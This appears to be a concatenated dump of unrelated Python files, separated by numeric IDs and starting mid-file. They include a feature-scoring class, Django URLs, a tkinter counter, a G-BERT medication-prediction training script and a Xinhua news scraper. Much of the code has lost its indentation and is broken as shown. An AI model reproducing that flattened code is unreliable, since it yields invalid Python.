- matrix_form: a type of the given matrix for feature-extraction computation. {term_freq, doc_freq}
- frequency_matrix: Matrix object(term-frequency or document-frequency). The matrix is data-source of feature-extraction computation.
"""
self.scored_matrix = scored_matrix
self.label2id_dict = label2id_dict
self.feature2id_dict = feature2id_dict
self.method = method
self.matrix_form = matrix_form
self.frequency_matrix = frequency_matrix
# For keeping old version
self.ScoreMatrix2ScoreDictionary = self.convert_score_matrix2score_record
def __conv_into_dict_format(self, word_score_items):
out_format_structure = {}
for item in word_score_items:
if item['label'] not in out_format_structure :
out_format_structure[item['label']] = [{'feature': item['word'], 'score': item['score']}]
else:
out_format_structure[item['label']].append({'feature': item['word'], 'score': item['score']})
return out_format_structure
def convert_score_matrix2score_record(self,
outformat:str='items',
sort_desc:bool=True):
"""* What you can do
- Get dictionary structure from weighted-featured scores.
- You can choose 'dict' or 'items' for ```outformat``` parameter.
* Output
---------------------
- If outformat='dict', you get
>>> {label_name:{feature: score}}
Else if outformat='items', you get
>>> [{feature: score}]
"""
scored_objects = self.get_feature_dictionary(
weighted_matrix=self.scored_matrix,
vocabulary=self.feature2id_dict,
label_group_dict=self.label2id_dict,
frequency_matrix=self.frequency_matrix
)
if sort_desc: scored_objects = \
sorted(scored_objects, key=lambda x: x['score'], reverse=True)
if outformat=='dict':
out_format_structure = self.__conv_into_dict_format(scored_objects)
elif outformat=='items':
out_format_structure = scored_objects
else:
raise ValueError('outformat must be either of {dict, items}')
return out_format_structure
def __get_value_index(self, row_index, column_index, weight_csr_matrix, verbose=False):
assert isinstance(row_index, (int, int32, int64))
assert isinstance(column_index, (int, int32, int64))
assert isinstance(weight_csr_matrix, (ndarray,csr_matrix))
value = weight_csr_matrix[row_index, column_index]
return value
def make_non_zero_information(self, weight_csr_matrix: csr_matrix)->List[ROW_COL_VAL]:
"""Construct Tuple of matrix value. Return value is array of ROW_COL_VAL namedtuple.
:param weight_csr_matrix:
:return:
"""
assert isinstance(weight_csr_matrix, (csr_matrix, ndarray))
row_col_index_array = weight_csr_matrix.nonzero()
row_indexes = row_col_index_array[0]
column_indexes = row_col_index_array[1]
assert len(row_indexes) == len(column_indexes)
value_index_items = [None] * len(row_indexes) # type: List[ROW_COL_VAL]
for i in range(0, len(row_indexes)):
value_index_items[i] = ROW_COL_VAL(row_indexes[i],
column_indexes[i],
self.__get_value_index(row_indexes[i], column_indexes[i], weight_csr_matrix))
return value_index_items
def SUB_FUNC_feature_extraction(self,
weight_row_col_val_obj: ROW_COL_VAL,
dict_index_information: Dict[str, Dict[str, str]],
dict_position2value: Dict[Tuple[int, int], float]=None)->Dict[str, Any]:
"""This function returns weighted score between label and words.
Input csr matrix must be 'document-frequency' matrix, where records #document that word appears in document set.
[NOTE] This is not TERM-FREQUENCY.
For example,
If 'iPhone' appears in 5 documents of 'IT' category document set, value must be 5.
Even if 10 'iPhone' words in 'IT' category document set, value is still 5.
"""
assert isinstance(weight_row_col_val_obj, ROW_COL_VAL)
feature_score_record = {
'score': weight_row_col_val_obj.val,
'label': self.get_label(weight_row_col_val_obj, dict_index_information['id2label']),
'feature': self.get_word(weight_row_col_val_obj, dict_index_information['id2vocab'])
}
        if dict_position2value is not None:
            if (weight_row_col_val_obj.col, weight_row_col_val_obj.row) in dict_position2value:
                frequency = dict_position2value[(weight_row_col_val_obj.col, weight_row_col_val_obj.row)]
else:
"""When a feature-extraction method is BNS, frequency=0 is possible."""
frequency = 0
feature_score_record.update({"frequency": frequency})
return feature_score_record
def get_feature_dictionary(self,
weighted_matrix: csr_matrix,
vocabulary:Dict[str, int],
label_group_dict:Dict[str, int],
cache_backend: str = 'PersistentDict',
is_use_cache: bool=True,
frequency_matrix: csr_matrix=None)->List[Dict[str, Any]]:
"""* What you can do
- Get dictionary structure from weighted-featured scores.
"""
assert isinstance(weighted_matrix, csr_matrix)
assert isinstance(vocabulary, dict)
assert isinstance(label_group_dict, dict)
logger.debug(msg='Start making scored dictionary object from scored matrix')
logger.debug(msg='Input matrix size= {} * {}'.format(weighted_matrix.shape[0], weighted_matrix.shape[1]))
weight_value_index_items = self.make_non_zero_information(weighted_matrix)
        if frequency_matrix is not None:
frequency_value_index_items = self.make_non_zero_information(frequency_matrix)
dict_position2value = {(t_col_row.col,t_col_row.row): t_col_row.val for t_col_row in frequency_value_index_items}
else:
dict_position2value = None
if is_use_cache:
dict_index_information = self.initialize_cache_dict_object(cache_backend, file_name='dict_index_information')
else:
dict_index_information = {}
dict_index_information['id2label'] = {value:key for key, value in label_group_dict.items()}
dict_index_information['id2vocab'] = {value:key for key, value in vocabulary.items()}
if isinstance(dict_index_information, SqliteDict):
dict_index_information.commit()
elif isinstance(dict_index_information, PersistentDict):
dict_index_information.sync()
else:
pass
# TODO may be this func takes too much time. consider cython.
seq_score_objects = [None] * len(weight_value_index_items) # type: List[Dict[str,Any]]
for i, weight_row_col_val_tuple in enumerate(weight_value_index_items):
seq_score_objects[i] = self.SUB_FUNC_feature_extraction(
weight_row_col_val_tuple,
dict_index_information,
dict_position2value)
logger.debug(msg='Finished making scored dictionary')
return seq_score_objects
def get_label(self, row_col_val_tuple, label_id)->str:
assert isinstance(row_col_val_tuple, ROW_COL_VAL)
assert isinstance(label_id, dict)
label = label_id[row_col_val_tuple.row]
return label
def get_word(self, row_col_val_tuple:ROW_COL_VAL, vocabulary:Dict[int,str])->Union[str,List[str],Tuple[str,...]]:
"""* what u can do
- It gets feature name from the given matrix object.
- A feature is json serialized, thus this method tries to de-serialize json string into python object.
- Original feature object is possibly string(word), list of str, list of str.
"""
assert isinstance(row_col_val_tuple, ROW_COL_VAL)
assert isinstance(vocabulary, dict)
vocab = vocabulary[row_col_val_tuple.col]
        try:
            feature_object = json.loads(vocab)
            if len(feature_object) == 1:
                # when the feature is a single word, the deserialized list has length 1
                feature_object = feature_object[0]
        except ValueError:
            feature_object = vocab
return feature_object
    def initialize_cache_dict_object(self, cache_backend: str, file_name: str, path_cache_file: str = None):
        # create a fresh temp dir per call; a mkdtemp() default in the signature
        # would be evaluated only once, at function definition time
        if path_cache_file is None:
            path_cache_file = mkdtemp()
        if cache_backend == 'PersistentDict':
            return PersistentDict(os.path.join(path_cache_file, file_name), flag='c', format='json')
        elif cache_backend == 'SqliteDict':
            return SqliteDict(os.path.join(path_cache_file, file_name), autocommit=True)
        else:
            raise Exception('No such cache_backend option named {}'.format(cache_backend))
FeatureType = TypeVar('FeatureType', str, Tuple[Any])
AvailableInputTypes = TypeVar('AvailableInputTypes', PersistentDict,
                              SqliteDict,
                              Dict[str, List[List[Union[str, Tuple[Any]]]]])
|
1697811
|
personas = int(input("How many people are in your dinner group? "))
if personas > 8:
    print("You will have to wait for a table")
else:
    print("Your table is ready")
|
1697821
|
from django.conf.urls.defaults import *
urlpatterns = patterns('saved_searches.views',
url(r'^most_recent/$', 'most_recent', name='saved_searches_most_recent'),
url(r'^most_recent/username/(?P<username>[\w\d._-]+)/$', 'most_recent', name='saved_searches_most_recent_by_user'),
url(r'^most_recent/area/(?P<search_key>[\w\d._-]*)/$', 'most_recent', name='saved_searches_most_recent_by_search_key'),
url(r'^most_recent/area/(?P<search_key>[\w\d._-]*)/username/(?P<username>[\w\d._-]+)/$', 'most_recent', name='saved_searches_most_recent_by_user_search_key'),
url(r'^most_popular/$', 'most_popular', name='saved_searches_most_popular'),
url(r'^most_popular/username/(?P<username>[\w\d._-]+)/$', 'most_popular', name='saved_searches_most_popular_by_user'),
url(r'^most_popular/area/(?P<search_key>[\w\d._-]*)/$', 'most_popular', name='saved_searches_most_popular_by_search_key'),
url(r'^most_popular/area/(?P<search_key>[\w\d._-]*)/username/(?P<username>[\w\d._-]+)/$', 'most_popular', name='saved_searches_most_popular_by_user_search_key'),
)
|
1697848
|
from typing import Any, Dict
from sovereign.sources.lib import Source
from sovereign.config_loader import Loadable
class File(Source):
def __init__(self, config: Dict[str, Any], scope: str = "default"):
super(File, self).__init__(config, scope)
try:
self.path = Loadable.from_legacy_fmt(config["path"])
except KeyError:
try:
self.path = Loadable(**config["spec"])
except KeyError:
raise KeyError('File source needs to specify "spec" within config')
def get(self) -> Any:
"""
Uses the file config loader to load the given path
"""
return self.path.load()
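# Hedged usage sketch: the 'file+yaml://' legacy scheme below is an assumption
# drawn from sovereign's loader syntax; check Loadable.from_legacy_fmt and the
# Loadable fields for the formats actually accepted.
def _example_file_source():
    source = File({"path": "file+yaml:///etc/sovereign/instances.yaml"})
    return source.get()  # loads and deserializes the file's contents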
|
1697856
|
import json
import os
import typing
from pathlib import Path
import reseval
###############################################################################
# Get subjective evaluation results
###############################################################################
def results(
name: str,
directory: typing.Union[str, bytes, os.PathLike] = Path()) -> dict:
"""Get the results of a subjective evaluation
Args:
name: The name of the subjective evaluation to retrieve results for
directory: The directory to save results
Returns:
dict: Evaluation results
"""
    # Accept both str and PathLike directories
    directory = Path(directory)
    # Download and save crowdsource results
    crowdsource = reseval.crowdsource.assignments(name)
    crowdsource_file = directory / name / 'crowdsource' / 'crowdsource.json'
crowdsource_file.parent.mkdir(exist_ok=True, parents=True)
with open(crowdsource_file, 'w') as file:
json.dump(crowdsource, file, indent=4, default=str)
# Download database tables
reseval.database.download(
name,
reseval.EVALUATION_DIRECTORY / name / 'tables')
if directory is not None:
reseval.database.download(name, directory / name / 'tables')
# Load responses
config = reseval.load.config_by_name(name)
conditions = reseval.load.conditions(name)
responses = reseval.load.responses(name)
# No responses yet
if len(responses) == 0:
results = {'samples': 0, 'conditions': {}}
# Save results
with open(directory / name / 'results.json', 'w') as file:
json.dump(results, file, indent=4)
return results
# Get condition names
conditions = [condition['Condition'] for condition in conditions]
# Group results by file stems
responses_by_stem = {}
for response in responses:
stem = response['Stem']
if stem in responses_by_stem:
responses_by_stem[stem].append(response['Response'])
else:
responses_by_stem[stem] = [response['Response']]
# Get test
test = reseval.test.get(config)
# Analyze results
analysis, stem_scores = test.analyze(
conditions,
responses_by_stem,
config['random_seed'])
# Save results
with open(directory / name / 'results.json', 'w') as file:
json.dump(analysis | {'stems': stem_scores}, file, indent=4)
return analysis
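# Hedged usage sketch ('my-evaluation' is a hypothetical evaluation name;
# requires the evaluation to exist and credentials to be configured):
def _example_results():
    analysis = results('my-evaluation', Path('runs'))
    return analysis  # also written to runs/my-evaluation/results.json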
|
1697892
|
import tkinter as tk
count = 0
def reset():
    global count
    count = 0
def EXIT():
    window.destroy()
def counter():
    global count
    # update the label, colouring it as the count crosses thresholds
    if 10 <= count < 20:
        label2.config(text=str(count), fg='green')
    elif count >= 20:
        label2.config(text=str(count), fg='red2')
    else:
        label2.config(text=str(count), fg='black')
    count += 1
    window.after(1000, counter)  # schedule the next tick in 1000 ms
window = tk.Tk()
label1 = tk.Label(window, text='COUNTER POWERED BY TK', bg='red2', fg='white', font='Helvetica 20 bold')
label2 = tk.Label(window, text=str(count), bg='white', fg='black', font='Helvetica 30 bold')
label1.pack()  # pack() handles automatic positioning
label2.pack()
btn1 = tk.Button(window, text='RESET', font='Helvetica 15 bold', bg='green', command=reset)
btn2 = tk.Button(window, text='EXIT', font='Helvetica 15 bold', bg='red2', command=EXIT)
btn1.pack()
btn2.pack()
counter()
window.mainloop()  # without this the window never enters the event loop
|
1697921
|
class BaseClass:
"""Simple BaseClass with a name."""
def __init__(self, name: str):
self.name = name
def say_hi(self):
print(f"I'm {self.name} of type {type(self)}")
def short_desc(self) -> str:
return f"BaseClass({self.name})"
class ChildClass(BaseClass):
"""Simple child class inheriting from BaseClass."""
def short_desc(self) -> str:
return "Child of " + super().short_desc()
class SecondBaseClass:
"""Simple BaseClass with a name."""
def say_ho(self) -> str:
return f"I don't have a name, but the type {type(self)}."
def short_desc(self) -> str:
return "SecondBaseClass()"
class DoubleChildClass(BaseClass, SecondBaseClass):
"""Simple child class inheriting from BaseClass and SecondBaseClass."""
def short_desc(self) -> str:
return "Child of " + super().short_desc()
class A:
pass
class B:
pass
class C(A, B):
pass
class D(A, B):
pass
class E(C, D):
pass
class F(A, B):
pass
class G(A, B):
pass
class H(F, G):
pass
class I(E, H):  # noqa: E742
pass
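# Hedged sketch: inspect the C3 method resolution order produced by the
# diamond hierarchies above.
def print_mro(cls):
    """Print each entry of cls.__mro__ on its own line."""
    for entry in cls.__mro__:
        print(entry)

if __name__ == "__main__":
    # For I(E, H) the linearization is I, E, C, D, H, F, G, A, B, object.
    print_mro(I)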
|
1697975
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
import logging
import argparse
import random
from tqdm import tqdm, trange
import dill
from collections import defaultdict
import numpy as np
import pandas as pd
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, Dataset
from torch.utils.data.distributed import DistributedSampler
from torch.optim import Adam
from tensorboardX import SummaryWriter
from utils import metric_report, t2n, get_n_params
from config import BertConfig
from predictive_models import GBERT_Predict_Side
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
class Voc(object):
def __init__(self):
self.idx2word = {}
self.word2idx = {}
def add_sentence(self, sentence):
for word in sentence:
if word not in self.word2idx:
self.idx2word[len(self.word2idx)] = word
self.word2idx[word] = len(self.word2idx)
class EHRTokenizer(object):
"""Runs end-to-end tokenization"""
def __init__(self, data_dir, special_tokens=("[PAD]", "[CLS]", "[MASK]")):
self.vocab = Voc()
# special tokens
self.vocab.add_sentence(special_tokens)
self.rx_voc = self.add_vocab(os.path.join(data_dir, 'rx-vocab.txt'))
self.dx_voc = self.add_vocab(os.path.join(data_dir, 'dx-vocab.txt'))
# code only in multi-visit data
self.rx_voc_multi = Voc()
self.dx_voc_multi = Voc()
with open(os.path.join(data_dir, 'rx-vocab-multi.txt'), 'r') as fin:
for code in fin:
self.rx_voc_multi.add_sentence([code.rstrip('\n')])
with open(os.path.join(data_dir, 'dx-vocab-multi.txt'), 'r') as fin:
for code in fin:
self.dx_voc_multi.add_sentence([code.rstrip('\n')])
def add_vocab(self, vocab_file):
voc = self.vocab
specific_voc = Voc()
with open(vocab_file, 'r') as fin:
for code in fin:
voc.add_sentence([code.rstrip('\n')])
specific_voc.add_sentence([code.rstrip('\n')])
return specific_voc
def convert_tokens_to_ids(self, tokens):
"""Converts a sequence of tokens into ids using the vocab."""
ids = []
for token in tokens:
ids.append(self.vocab.word2idx[token])
return ids
def convert_ids_to_tokens(self, ids):
"""Converts a sequence of ids in wordpiece tokens using the vocab."""
tokens = []
for i in ids:
tokens.append(self.vocab.idx2word[i])
return tokens
class EHRDataset(Dataset):
def __init__(self, data_pd, tokenizer: EHRTokenizer, max_seq_len):
self.data_pd = data_pd
self.tokenizer = tokenizer
self.seq_len = max_seq_len
self.sample_counter = 0
self.side_len = len(self.data_pd.iloc[0, 5:])
logger.info('side len %d' % self.side_len)
def transform_data(data):
"""
:param data: raw data form
:return: {subject_id, [adm, 2, codes]},
"""
records = {}
side_records = {}
for subject_id in data['SUBJECT_ID'].unique():
item_df = data[data['SUBJECT_ID'] == subject_id]
patient = []
sides = []
for _, row in item_df.iterrows():
admission = [list(row['ICD9_CODE']), list(row['ATC4'])]
patient.append(admission)
sides.append(row[5:].values)
if len(patient) < 2:
continue
records[subject_id] = patient
side_records[subject_id] = sides
return records, side_records
self.records, self.side_records = transform_data(data_pd)
def __len__(self):
return len(self.records)
def __getitem__(self, item):
cur_id = self.sample_counter
self.sample_counter += 1
subject_id = list(self.records.keys())[item]
def fill_to_max(l, seq):
while len(l) < seq:
l.append('[PAD]')
return l
"""extract input and output tokens
"""
input_tokens = [] # (2*max_len*adm)
output_dx_tokens = [] # (adm-1, l)
output_rx_tokens = [] # (adm-1, l)
for idx, adm in enumerate(self.records[subject_id]):
input_tokens.extend(
['[CLS]'] + fill_to_max(list(adm[0]), self.seq_len - 1))
input_tokens.extend(
['[CLS]'] + fill_to_max(list(adm[1]), self.seq_len - 1))
# output_rx_tokens.append(list(adm[1]))
if idx != 0:
output_rx_tokens.append(list(adm[1]))
output_dx_tokens.append(list(adm[0]))
"""convert tokens to id
"""
input_ids = self.tokenizer.convert_tokens_to_ids(input_tokens)
output_dx_labels = [] # (adm-1, dx_voc_size)
output_rx_labels = [] # (adm-1, rx_voc_size)
dx_voc_size = len(self.tokenizer.dx_voc_multi.word2idx)
rx_voc_size = len(self.tokenizer.rx_voc_multi.word2idx)
for tokens in output_dx_tokens:
tmp_labels = np.zeros(dx_voc_size)
tmp_labels[list(
map(lambda x: self.tokenizer.dx_voc_multi.word2idx[x], tokens))] = 1
output_dx_labels.append(tmp_labels)
for tokens in output_rx_tokens:
tmp_labels = np.zeros(rx_voc_size)
tmp_labels[list(
map(lambda x: self.tokenizer.rx_voc_multi.word2idx[x], tokens))] = 1
output_rx_labels.append(tmp_labels)
if cur_id < 5:
logger.info("*** Example ***")
logger.info("subject_id: %s" % subject_id)
logger.info("input tokens: %s" % " ".join(
[str(x) for x in input_tokens]))
logger.info("input_ids: %s" %
" ".join([str(x) for x in input_ids]))
assert len(input_ids) == (self.seq_len *
2 * len(self.records[subject_id]))
assert len(output_dx_labels) == (len(self.records[subject_id]) - 1)
# assert len(output_rx_labels) == len(self.records[subject_id])-1
"""extract side
"""
sides = self.side_records[subject_id][1:]
assert len(sides) == len(output_dx_labels)
cur_tensors = (torch.tensor(input_ids).view(-1, self.seq_len),
torch.tensor(output_dx_labels, dtype=torch.float),
torch.tensor(output_rx_labels, dtype=torch.float),
torch.tensor(sides, dtype=torch.float))
return cur_tensors
def load_dataset(args):
data_dir = args.data_dir
max_seq_len = args.max_seq_length
# load tokenizer
tokenizer = EHRTokenizer(data_dir)
# load data
data = pd.read_pickle(os.path.join(data_dir, 'data-multi-visit.pkl'))
# load side
side_pd = pd.read_pickle(os.path.join(data_dir, 'data-multi-side.pkl'))
# concat
data = data.merge(side_pd, how='inner', on=['SUBJECT_ID', 'HADM_ID'])
    # load train, eval, test data
ids_file = [os.path.join(data_dir, 'train-id.txt'),
os.path.join(data_dir, 'eval-id.txt'),
os.path.join(data_dir, 'test-id.txt')]
def load_ids(data, file_name):
"""
:param data: multi-visit data
:param file_name:
:return: raw data form
"""
ids = []
with open(file_name, 'r') as f:
for line in f:
ids.append(int(line.rstrip('\n')))
return data[data['SUBJECT_ID'].isin(ids)].reset_index(drop=True)
return tokenizer, tuple(map(lambda x: EHRDataset(load_ids(data, x), tokenizer, max_seq_len), ids_file))
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument("--model_name", default='GBert-predict-side', type=str, required=False,
help="model name")
parser.add_argument("--data_dir",
default='../data',
type=str,
required=False,
help="The input data dir.")
parser.add_argument("--pretrain_dir", default='../saved/GBert-predict', type=str, required=False,
help="pretraining model dir.")
parser.add_argument("--train_file", default='data-multi-visit.pkl', type=str, required=False,
help="training data file.")
parser.add_argument("--output_dir",
default='../saved/',
type=str,
required=False,
help="The output directory where the model checkpoints will be written.")
# Other parameters
parser.add_argument("--use_pretrain",
default=True,
action='store_true',
help="is use pretrain")
parser.add_argument("--graph",
default=False,
action='store_true',
help="if use ontology embedding")
parser.add_argument("--therhold",
default=0.3,
type=float,
help="therhold.")
parser.add_argument("--max_seq_length",
default=55,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--do_train",
default=False,
action='store_true',
help="Whether to run training.")
parser.add_argument("--do_eval",
default=True,
action='store_true',
help="Whether to run on the dev set.")
parser.add_argument("--do_test",
default=True,
action='store_true',
help="Whether to run on the test set.")
parser.add_argument("--train_batch_size",
default=1,
type=int,
help="Total batch size for training.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs",
default=40.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--no_cuda",
action='store_true',
help="Whether not to use CUDA when available")
parser.add_argument('--seed',
type=int,
default=1203,
help="random seed for initialization")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
args = parser.parse_args()
args.output_dir = os.path.join(args.output_dir, args.model_name)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
device = torch.device("cuda" if torch.cuda.is_available()
and not args.no_cuda else "cpu")
if not args.do_train and not args.do_eval:
raise ValueError(
"At least one of `do_train` or `do_eval` must be True.")
# if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
# raise ValueError(
# "Output directory ({}) already exists and is not empty.".format(args.output_dir))
os.makedirs(args.output_dir, exist_ok=True)
print("Loading Dataset")
tokenizer, (train_dataset, eval_dataset, test_dataset) = load_dataset(args)
train_dataloader = DataLoader(train_dataset,
sampler=RandomSampler(train_dataset),
batch_size=1)
eval_dataloader = DataLoader(eval_dataset,
sampler=SequentialSampler(eval_dataset),
batch_size=1)
test_dataloader = DataLoader(test_dataset,
sampler=SequentialSampler(test_dataset),
batch_size=1)
print('Loading Model: ' + args.model_name)
# config = BertConfig(vocab_size_or_config_json_file=len(tokenizer.vocab.word2idx), side_len=train_dataset.side_len)
# config.graph = args.graph
# model = SeperateBertTransModel(config, tokenizer.dx_voc, tokenizer.rx_voc)
if args.use_pretrain:
logger.info("Use Pretraining model")
model = GBERT_Predict_Side.from_pretrained(
args.pretrain_dir, tokenizer=tokenizer, side_len=train_dataset.side_len)
else:
config = BertConfig(
vocab_size_or_config_json_file=len(tokenizer.vocab.word2idx))
config.graph = args.graph
model = GBERT_Predict_Side(config, tokenizer, train_dataset.side_len)
logger.info('# of model parameters: ' + str(get_n_params(model)))
model.to(device)
    model_to_save = model.module if hasattr(
        model, 'module') else model  # only save the model itself
rx_output_model_file = os.path.join(
args.output_dir, "pytorch_model.bin")
# Prepare optimizer
# num_train_optimization_steps = int(
# len(train_dataset) / args.train_batch_size) * args.num_train_epochs
# param_optimizer = list(model.named_parameters())
# no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
# optimizer_grouped_parameters = [
# {'params': [p for n, p in param_optimizer if not any(
# nd in n for nd in no_decay)], 'weight_decay': 0.01},
# {'params': [p for n, p in param_optimizer if any(
# nd in n for nd in no_decay)], 'weight_decay': 0.0}
# ]
# optimizer = BertAdam(optimizer_grouped_parameters,
# lr=args.learning_rate,
# warmup=args.warmup_proportion,
# t_total=num_train_optimization_steps)
optimizer = Adam(model.parameters(), lr=args.learning_rate)
global_step = 0
if args.do_train:
writer = SummaryWriter(args.output_dir)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Batch size = %d", 1)
dx_acc_best, rx_acc_best = 0, 0
acc_name = 'prauc'
dx_history = {'prauc': []}
rx_history = {'prauc': []}
for _ in trange(int(args.num_train_epochs), desc="Epoch"):
print('')
tr_loss = 0
nb_tr_examples, nb_tr_steps = 0, 0
prog_iter = tqdm(train_dataloader, leave=False, desc='Training')
model.train()
for _, batch in enumerate(prog_iter):
batch = tuple(t.to(device) for t in batch)
input_ids, dx_labels, rx_labels, input_sides = batch
input_ids, dx_labels, rx_labels, input_sides = input_ids.squeeze(
dim=0), dx_labels.squeeze(dim=0), rx_labels.squeeze(dim=0), input_sides.squeeze(dim=0)
loss, rx_logits = model(input_ids, dx_labels=dx_labels, rx_labels=rx_labels,
epoch=global_step, input_sides=input_sides)
loss.backward()
tr_loss += loss.item()
nb_tr_examples += 1
nb_tr_steps += 1
# Display loss
prog_iter.set_postfix(loss='%.4f' % (tr_loss / nb_tr_steps))
optimizer.step()
optimizer.zero_grad()
writer.add_scalar('train/loss', tr_loss / nb_tr_steps, global_step)
global_step += 1
if args.do_eval:
print('')
logger.info("***** Running eval *****")
model.eval()
rx_y_preds = []
rx_y_trues = []
for eval_input in tqdm(eval_dataloader, desc="Evaluating"):
eval_input = tuple(t.to(device) for t in eval_input)
input_ids, dx_labels, rx_labels, input_sides = eval_input
input_ids, dx_labels, rx_labels, input_sides = input_ids.squeeze(
), dx_labels.squeeze(), rx_labels.squeeze(dim=0), input_sides.squeeze(dim=0)
with torch.no_grad():
loss, rx_logits = model(
input_ids, dx_labels=dx_labels, rx_labels=rx_labels, input_sides=input_sides)
rx_y_preds.append(t2n(torch.sigmoid(rx_logits)))
rx_y_trues.append(t2n(rx_labels))
print('')
rx_acc_container = metric_report(np.concatenate(rx_y_preds, axis=0), np.concatenate(rx_y_trues, axis=0),
args.therhold)
writer.add_scalars(
'eval_rx', rx_acc_container, global_step)
if rx_acc_container[acc_name] > rx_acc_best:
rx_acc_best = rx_acc_container[acc_name]
# save model
torch.save(model_to_save.state_dict(),
rx_output_model_file)
with open(os.path.join(args.output_dir, 'bert_config.json'), 'w', encoding='utf-8') as fout:
fout.write(model.config.to_json_string())
if args.do_test:
logger.info("***** Running test *****")
logger.info(" Num examples = %d", len(test_dataset))
logger.info(" Batch size = %d", 1)
def test(task=0):
# Load a trained model that you have fine-tuned
model_state_dict = torch.load(rx_output_model_file)
model.load_state_dict(model_state_dict)
model.to(device)
model.eval()
y_preds = []
y_trues = []
for test_input in tqdm(test_dataloader, desc="Testing"):
test_input = tuple(t.to(device) for t in test_input)
input_ids, dx_labels, rx_labels, input_sides = test_input
input_ids, dx_labels, rx_labels, input_sides = input_ids.squeeze(
), dx_labels.squeeze(), rx_labels.squeeze(dim=0), input_sides.squeeze(dim=0)
with torch.no_grad():
loss, rx_logits = model(
input_ids, dx_labels=dx_labels, rx_labels=rx_labels, input_sides=input_sides)
y_preds.append(t2n(torch.sigmoid(rx_logits)))
y_trues.append(t2n(rx_labels))
print('')
acc_container = metric_report(np.concatenate(y_preds, axis=0), np.concatenate(y_trues, axis=0),
args.therhold)
# save report
writer.add_scalars('test', acc_container, 0)
return acc_container
test(task=0)
if __name__ == "__main__":
main()
|
1697984
|
from bs4 import BeautifulSoup
from datetime import datetime
from threading import Lock
mutex = Lock()
class AdapterXinhua:
def __init__(self):
self.clear()
def clear(self):
self.name = 'xinhua'
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
}
self.links = set()
self.linksPos = 0
self.initCnt = 0
self.category = {
0: '国际',
1: '时政',
2: '军事',
3: '科技'
}
self.hostList = [
'http://www.xinhuanet.com/world',
'http://www.xinhuanet.com/politics',
'http://www.xinhuanet.com/mil',
'http://www.xinhuanet.com/tech',
'http://www.xinhuanet.com/',
'http://www.xinhuanet.com/world/hqlft2017/',
'http://www.xinhuanet.com/world/hqgc.htm',
'http://www.xinhuanet.com/world/wmyl.htm',
'http://www.xinhuanet.com/politics/xgc.htm',
'http://www.xinhuanet.com/politics/ytgz.htm',
'http://www.xinhuanet.com/politics/szzt.htm',
'http://www.xinhuanet.com/tech/hlwj.htm',
'http://www.xinhuanet.com/tech/Eyt.htm',
'http://www.xinhuanet.com/tech/wgc.htm',
'http://www.xinhuanet.com/tech/ijm.htm',
'http://www.xinhuanet.com/tech/sxj.htm',
'http://www.xinhuanet.com/tech/cyb.htm',
'http://www.xinhuanet.com/tech/5gsd/index.htm'
]
self.initCntLimit = len(self.hostList)
# self.initCntLimit = 1
self.validCnt = 0
self.existLinks = set()
def addValidLink(self, link):
self.existLinks.add(link)
def host(self, op):
return self.hostList[op]
def init(self, op, text):
def strip(x):
ps = x.find('#')
if ps != -1:
x = x[:ps]
ps = x.find('?')
if ps != -1:
x = x[:ps]
return x
bs = BeautifulSoup(text, 'html.parser')
for lks in bs.find_all('a'):
lk = str(lks.get('href'))
if lk.startswith(self.host(0) + '/2018') or \
lk.startswith(self.host(1) + '/2018') or \
lk.startswith(self.host(2) + '/2018'):
lk = strip(lk)
if lk not in self.existLinks:
self.links.add(lk)
def hasNextInit(self):
return self.initCnt < self.initCntLimit
def nextInitParam(self):
self.initCnt += 1
return 0, self.host(self.initCnt - 1), self.headers, {}
def eval(self, op, text):
# title, stamp, content, category, source, url
data = dict()
bs = BeautifulSoup(text, 'html.parser')
def escape(x):
x = x.replace(u'\xa0', u' ')
x = x.replace(u'\u3000', u' ')
x = x.strip()
return x
def parseContent(x):
bg = x.find('<p')
ed = x.rfind('</p>')
if bg == -1:
return x
ed += 4
return x[bg:ed]
cat = 0
for i in range(len(self.category)):
if self.links[op].startswith(self.host(i)):
cat = i
data['category'] = self.category[i]
a = None
if cat in [0, 1]:
a = bs.find('div', attrs={'class': 'h-title'})
elif cat == 2:
a = bs.find('h1', attrs={'id': 'title'})
if a:
data['title'] = escape(a.text)
if cat in [0, 1]:
a = bs.find('span', attrs={'class': 'h-time'})
elif cat == 2:
a = bs.find('span', attrs={'class': 'time'})
if a:
if cat in [0, 1]:
a = datetime.strptime(escape(a.text), '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%d %H:%M:%S')
elif cat == 2:
a = datetime.strptime(escape(a.text), '%Y年%m月%d日 %H:%M:%S').strftime('%Y-%m-%d %H:%M:%S')
data['stamp'] = a
a = bs.find('em', attrs={'id': 'source'})
if a:
data['source'] = {'link': '', 'text': escape(a.text)}
if cat in [0, 1]:
a = bs.find('div', attrs={'id': 'p-detail'})
elif cat == 2:
a = bs.find('div', attrs={'class': 'article'})
if a and ''.join(a.text.split()):
data['content'] = parseContent(str(a))
ID = None
if 'content' in data and data['content']:
mutex.acquire()
self.validCnt += 1
ID = self.name + '_' + str(len(self.existLinks) + self.validCnt)
mutex.release()
data['url'] = self.links[op]
return ID, data
def hasNext(self):
        if self.linksPos == 0:
            # freeze the link set into a list so eval() can index it by position
            self.links = list(self.links)
            self.validCnt = 0
return self.linksPos < len(self.links)
def nextParam(self):
self.linksPos += 1
